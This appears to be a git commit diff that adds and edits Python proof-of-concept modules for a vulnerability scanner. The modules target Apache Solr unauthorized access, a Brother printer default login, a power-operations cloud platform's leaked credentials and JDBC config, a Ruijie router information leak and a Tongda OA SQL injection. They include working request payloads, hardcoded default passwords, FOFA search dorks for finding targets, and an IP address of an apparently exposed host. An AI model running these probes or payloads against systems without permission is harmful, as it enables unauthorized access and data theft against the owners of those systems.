2.23.9

2022-11-02 17:32:17 +08:00
parent 3fb09bcb93
commit 4eab50ae85
8 changed files with 395 additions and 20 deletions
--- a/poc/Apache_Solr/Unauth_Access/poc.py
+++ b/poc/Apache_Solr/Unauth_Access/poc.py
@@ -0,0 +1,72 @@
+# coding:utf-8  
+import requests
+from lib.core.common import url_handle
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+
+class POC(POCBase):
+    _info = {
+        "author" : "Du9r1",                 # POC作者
+        "version" : "1",                    # POC版本，默认是1  
+        "CreateDate" : "2022-11-2",         # POC创建时间
+        "UpdateDate" : "2022-11-2",         # POC创建时间
+        "PocDesc" : """
+            略
+        """,                                # POC描述，写更新描述，没有就不写
+
+        "name" : "Solr未授权访问",                        # 漏洞名称
+        "VulnID" : "",                      # 漏洞编号，以CVE为主，若无CVE，使用CNVD，若无CNVD，留空即可
+
+        "AppName" : "solr",                     # 漏洞应用名称
+        "AppVersion" : "全版本",                  # 漏洞应用版本
+        "VulnDate" : "2021-03-10",                    # 漏洞公开的时间,不知道就写能查到的最早的文献日期，格式：xxxx-xx-xx
+        "VulnDesc" : """
+        Solr应用服务器安装后未进行管理界面访问限制,导致管理界面可直接进行访问,泄露敏感信息并可对Solr进行进一步的管理。
+        当开发者配置不当时就可能造成未授权访问漏洞。
+        """,                                # 漏洞简要描述
+
+        "fofa-dork":'title="solr"&&country="CN"',                     # fofa搜索语句
+        "example" : "",                     # 存在漏洞的演示url，写一个就可以了
+        "exp_img" : "",                      # 先不管  
+
+    }
+
+    timeout = 10
+
+    def _verify(self):
+        """
+        返回vuln
+
+        存在漏洞：vuln = [True,html_source] # html_source就是页面源码  
+
+        不存在漏洞：vuln = [False,""]
+        """
+        vuln = [False,""]
+        url = self.target + "/solr/admin/cores" # url自己按需调整
+
+        headers = {"User-Agent":"Mozilla/5.0 (Windows ME; U;cd en) Opera 8.51",
+                    "Connection":"close"}
+
+        try:
+            """
+            检测逻辑，漏洞存在则修改vuln值，漏洞不存在则不动
+            """
+            req = requests.get(url,headers = headers , proxies = self.proxy , timeout = self.timeout,verify = False)
+            if req.status_code == 200 and "responseHeader" in req.text:
+                vuln = [True,req.text]
+            else:
+                vuln = [False,""]
+        except Exception as e:
+            raise e
+
+        if self._honeypot_check(vuln[1]) == True:
+            vuln[0] = False
+        
+        return vuln
+
+
+    def _attack(self):
+        return self._verify()
--- a/MFC-L2730DW/Weak_Pass/poc.py
+++ b/MFC-L2730DW/Weak_Pass/poc.py
@@ -0,0 +1,73 @@
+# coding:utf-8  
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+    _info = {
+        "author" : "hansi",                      # POC作者
+        "version" : "1",                    # POC版本，默认是1  
+        "CreateDate" : "2022-09-07",        # POC创建时间
+        "UpdateDate" : "2022-09-07",        # POC创建时间
+        "PocDesc" : """
+        略  
+        """,                                # POC描述，写更新描述，没有就不写
+
+        "name" : "Brother MFC-L2730DW series弱口令漏洞",                        # 漏洞名称
+        "VulnID" : "oFx-2022-0906",                      # 漏洞编号，以CVE为主，若无CVE，使用CNVD，若无CNVD，留空即可
+        "AppName" : "",                     # 漏洞应用名称
+        "AppVersion" : "",                  # 漏洞应用版本
+        "VulnDate" : "2022-09-07",                    # 漏洞公开的时间,不知道就写今天，格式：xxxx-xx-xx
+        "VulnDesc" : """
+	
+        """,                                # 漏洞简要描述
+
+        "fofa-dork":"""
+            title="Brother HL-L8360CDW series"
+        """,                     # fofa搜索语句
+        "example" : "",                     # 存在漏洞的演示url，写一个就可以了
+        "exp_img" : "",                      # 先不管  
+    }
+
+
+    def _verify(self):
+        """
+        返回vuln
+
+        存在漏洞：vuln = [True,html_source] # html_source就是页面源码  
+
+        不存在漏洞：vuln = [False,""]
+        """
+        vuln = [False,""]
+        url = self.target + "/general/status.html" # url自己按需调整
+        data = "CSRFToken=uDmE4RvNEHZfHNtcOruqZPtWbT3IjovV%2B4zyo6cxVUZWt2Loyw%3D%3D&B5be=initpass&loginurl=%2Fgeneral%2Fstatus.html"
+
+        headers = {"User-Agent":get_random_ua(),
+                    "Connection":"close",
+                    # "Content-Type": "application/x-www-form-urlencoded",
+                    }
+        
+        try:
+            """
+            检测逻辑，漏洞存在则修改vuln值为True，漏洞不存在则不动
+            """
+            req = requests.post(url,headers = headers , data= data ,proxies = self.proxy ,timeout = self.timeout,verify = False)
+            if "Administrator" in req.text:#req.status_code == 200 and :
+                vuln = [True,req.text]
+            else:
+                vuln = [False,req.text]
+        except Exception as e:
+            raise e
+        
+        # 以下逻辑酌情使用
+        if self._honeypot_check(vuln[1]) == True:
+            vuln[0] = False
+        
+        return vuln
+
+    def _attack(self):
+        return self._verify()
--- a/poc/PuYuan/Config_Info_Disclosure/poc.py
+++ b/poc/PuYuan/Config_Info_Disclosure/poc.py
@@ -0,0 +1,73 @@
+# coding:utf-8  
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+    _info = {
+        "author" : "hansi",                      # POC作者
+        "version" : "1",                    # POC版本，默认是1  
+        "CreateDate" : "2021-06-09",        # POC创建时间
+        "UpdateDate" : "2021-06-09",        # POC创建时间
+        "PocDesc" : """
+        略  
+        """,                                # POC描述，写更新描述，没有就不写
+
+        "name" : "普元电力发展有限公司电力运维云平台管理口令泄露漏洞",                        # 漏洞名称
+        "VulnID" : "oFx-2021-0001",                      # 漏洞编号，以CVE为主，若无CVE，使用CNVD，若无CNVD，留空即可
+        "AppName" : "电力运维云平台管理口令泄露漏洞",                     # 漏洞应用名称
+        "AppVersion" : "",                  # 漏洞应用版本
+        "VulnDate" : "2021-09-02",                    # 漏洞公开的时间,不知道就写今天，格式：xxxx-xx-xx
+        "VulnDesc" : """
+            访问/config/configVue.js文件，发现其存在MQTT的配置信息，其账号密码也是web登录的账号密码。这个账号也是其默认admin的默认账号密码。利用该账号密码可登录多个平台。
+        """,                                # 漏洞简要描述
+
+        "fofa-dork":"""
+            icon_hash="-1291691164"
+        """,                     # fofa搜索语句
+        "example" : "",                     # 存在漏洞的演示url，写一个就可以了
+        "exp_img" : "",                      # 先不管  
+    }
+
+
+    def _verify(self):
+        """
+        返回vuln
+
+        存在漏洞：vuln = [True,html_source] # html_source就是页面源码  
+
+        不存在漏洞：vuln = [False,""]
+        """
+        vuln = [False,""]
+        url = self.target + "/config/configVue.js" # url自己按需调整
+        
+
+        headers = {"User-Agent":get_random_ua(),
+                    "Connection":"close",
+                    # "Content-Type": "application/x-www-form-urlencoded",
+                    }
+        
+        try:
+            """
+            检测逻辑，漏洞存在则修改vuln值为True，漏洞不存在则不动
+            """
+            req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+            if "MQTT_USERNAME:'admin'" and "MQTT_KEY:'Acrel001'"in req.text:#req.status_code == 200 and :
+                vuln = [True,req.text]
+            else:
+                vuln = [False,req.text]
+        except Exception as e:
+            raise e
+        
+        # 以下逻辑酌情使用
+        if self._honeypot_check(vuln[1]) == True:
+            vuln[0] = False
+        
+        return vuln
+
+    def _attack(self):
+        return self._verify()
--- a/poc/PuYuan/Info_Disclosure/poc.py
+++ b/poc/PuYuan/Info_Disclosure/poc.py
@@ -0,0 +1,73 @@
+# coding:utf-8  
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+    _info = {
+        "author" : "hansi",                      # POC作者
+        "version" : "1",                    # POC版本，默认是1  
+        "CreateDate" : "2021-06-09",        # POC创建时间
+        "UpdateDate" : "2021-06-09",        # POC创建时间
+        "PocDesc" : """
+        略  
+        """,                                # POC描述，写更新描述，没有就不写
+
+        "name" : "普元电力发展有限公司电力运维云平台存在数据库配置信息泄露漏洞",                        # 漏洞名称
+        "VulnID" : "oFx-2021-0001",                      # 漏洞编号，以CVE为主，若无CVE，使用CNVD，若无CNVD，留空即可
+        "AppName" : "电力运维云平台存在数据库配置信息泄露漏洞",                     # 漏洞应用名称
+        "AppVersion" : "",                  # 漏洞应用版本
+        "VulnDate" : "2021-09-02",                    # 漏洞公开的时间,不知道就写今天，格式：xxxx-xx-xx
+        "VulnDesc" : """
+	  电力运维云平台存在数据库配置信息泄露漏洞，泄露相应的数据库配置信息。
+        """,                                # 漏洞简要描述
+
+        "fofa-dork":"""
+            icon_hash="-1291691164"
+        """,                     # fofa搜索语句
+        "example" : "",                     # 存在漏洞的演示url，写一个就可以了
+        "exp_img" : "",                      # 先不管  
+    }
+
+
+    def _verify(self):
+        """
+        返回vuln
+
+        存在漏洞：vuln = [True,html_source] # html_source就是页面源码  
+
+        不存在漏洞：vuln = [False,""]
+        """
+        vuln = [False,""]
+        url = self.target + "/fileSystem/jdbc/jdbc.properties" # url自己按需调整
+        
+
+        headers = {"User-Agent":get_random_ua(),
+                    "Connection":"close",
+                    # "Content-Type": "application/x-www-form-urlencoded",
+                    }
+        
+        try:
+            """
+            检测逻辑，漏洞存在则修改vuln值为True，漏洞不存在则不动
+            """
+            req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+            if "jdbc.properties" in req.text:#req.status_code == 200 and :
+                vuln = [True,req.text]
+            else:
+                vuln = [False,req.text]
+        except Exception as e:
+            raise e
+        
+        # 以下逻辑酌情使用
+        if self._honeypot_check(vuln[1]) == True:
+            vuln[0] = False
+        
+        return vuln
+
+    def _attack(self):
+        return self._verify()
--- a/poc/Ruijie_锐捷/Unauth_Access/poc.py
+++ b/poc/Ruijie_锐捷/Unauth_Access/poc.py
@@ -0,0 +1,72 @@
+# coding:utf-8  
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+    _info = {
+        "author" : "hansi",                      # POC作者
+        "version" : "1",                    # POC版本，默认是1  
+        "CreateDate" : "2022-09-07",        # POC创建时间
+        "UpdateDate" : "2022-09-07",        # POC创建时间
+        "PocDesc" : """
+	锐捷路由器（RG-NBR800GW）存在未授权访问漏洞，攻击者可以通过特殊手段获取路由器敏感信息，如内网地址mac等
+        """,                                # POC描述，写更新描述，没有就不写
+
+        "name" : "锐捷路由器（RG-NBR800GW）存在未授权访问漏洞",                        # 漏洞名称
+        "VulnID" : "oFx-2022-0916",                      # 漏洞编号，以CVE为主，若无CVE，使用CNVD，若无CNVD，留空即可
+        "AppName" : "",                     # 漏洞应用名称
+        "AppVersion" : "RG-NBR800GW",                  # 漏洞应用版本
+        "VulnDate" : "2022-09-16",                    # 漏洞公开的时间,不知道就写今天，格式：xxxx-xx-xx
+        "VulnDesc" : """
+	
+        """,                                # 漏洞简要描述
+
+        "fofa-dork":"""
+            icon_hash="772273815"
+        """,                     # fofa搜索语句
+        "example" : "http://47.253.113.46:9999/index.data?opt=err&_=1663068005",                     # 存在漏洞的演示url，写一个就可以了
+        "exp_img" : "",                      # 先不管  
+    }
+
+
+    def _verify(self):
+        """
+        返回vuln
+
+        存在漏洞：vuln = [True,html_source] # html_source就是页面源码  
+
+        不存在漏洞：vuln = [False,""]
+        """
+        vuln = [False,""]
+        url = self.target + "/index.data?opt=err&_=1663068005"
+
+        headers = {"User-Agent":get_random_ua(),
+                    "Connection":"close",
+                    # "Content-Type": "application/x-www-form-urlencoded",
+                    }
+
+        try:
+            """
+            检测逻辑，漏洞存在则修改vuln值为True，漏洞不存在则不动
+            """
+            req = requests.get(url,headers = headers,  proxies = self.proxy ,timeout = self.timeout,verify = False)
+            if "{vs:'RG-NBR" in req.text:#req.status_code == 200 and :
+                vuln = [True,req.text]
+            else:
+                vuln = [False,req.text]
+        except Exception as e:
+            raise e
+        
+        # 以下逻辑酌情使用
+        if self._honeypot_check(vuln[1]) == True:
+            vuln[0] = False
+        
+        return vuln
+
+    def _attack(self):
+        return self._verify()
--- a/poc/Tongda_通达OA/Sql_inj_TongDa/poc.py
+++ b/poc/Tongda_通达OA/Sql_inj_TongDa/poc.py
@@ -2,7 +2,6 @@
 import requests
 from lib.core.common import url_handle,get_random_ua
 from lib.core.poc import POCBase
-
 # ...
 import urllib3
 urllib3.disable_warnings()
@@ -12,29 +11,29 @@ class POC(POCBase):
    _info = {
        "author" : "hansi",                      # POC作者
        "version" : "1",                    # POC版本，默认是1  
-        "CreateDate" : "2021-06-18",        # POC创建时间
-        "UpdateDate" : "2021-06-18",        # POC创建时间
+        "CreateDate" : "2022-09-06",        # POC创建时间
+        "UpdateDate" : "2022-09-06",        # POC创建时间
        "PocDesc" : """
-        
+        略  
        """,                                # POC描述，写更新描述，没有就不写

-        "name" : "通达OA前台存在sql注入",                        # 漏洞名称
-        "VulnID" : "",                      # 漏洞编号，以CVE为主，若无CVE，使用CNVD，若无CNVD，留空即可
+        "name" : "通达OA 11.9,SQL注入漏洞",                        # 漏洞名称
+        "VulnID" : "oFx-2022-0906",                      # 漏洞编号，以CVE为主，若无CVE，使用CNVD，若无CNVD，留空即可
        "AppName" : "",                     # 漏洞应用名称
-        "AppVersion" : "无",                 # 漏洞应用版本
-        "VulnDate" : "2021-03-10",                    # 漏洞公开的时间,不知道就写今天，格式：xxxx-xx-xx
+        "AppVersion" : "",                  # 漏洞应用版本
+        "VulnDate" : "2022-09-06",                    # 漏洞公开的时间,不知道就写今天，格式：xxxx-xx-xx
        "VulnDesc" : """
-       			 通达OA前台存在sql注入
+	
        """,                                # 漏洞简要描述

        "fofa-dork":"""
-        app="TDXK-通达OA"
+            app="TDXK-通达OA"
        """,                     # fofa搜索语句
        "example" : "",                     # 存在漏洞的演示url，写一个就可以了
        "exp_img" : "",                      # 先不管  
-
    }

+
    def _verify(self):
        """
        返回vuln
@@ -44,8 +43,8 @@ class POC(POCBase):
        不存在漏洞：vuln = [False,""]
        """
        vuln = [False,""]
-        url = self.target + "/general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5%20whe\re%201={`\=%27`%201}%20un\ion%20(s\elect%20user_name,byname%20fr\om%20user%20whe\re%201\={`=`%201})--%20%27'" # url自己按需调整
-
+        url = self.target + "/general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1,1,1&tab=5%20where%202={`=%27`%201}%20union%20(select%20CURRENT_USER(),version(),SCHEMA())--%20%27" # url自己按需调整
+        

        headers = {"User-Agent":get_random_ua(),
                    "Connection":"close",
@@ -54,21 +53,21 @@ class POC(POCBase):
        
        try:
            """
-            检测逻辑，漏洞存在则修改vuln值，漏洞不存在则不动
+            检测逻辑，漏洞存在则修改vuln值为True，漏洞不存在则不动
            """
-            req = requests.get(url,headers = headers , proxies = self.proxy , timeout = self.timeout,verify = False)
-            if req.status_code == 200 and "1" in req.text:
+            req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+            if "root@::1;td_oa;5.6.35-log"in req.text:#req.status_code == 200 and :
                vuln = [True,req.text]
            else:
                vuln = [False,req.text]
        except Exception as e:
            raise e
-
+        
+        # 以下逻辑酌情使用
        if self._honeypot_check(vuln[1]) == True:
            vuln[0] = False
        
        return vuln

-
    def _attack(self):
        return self._verify()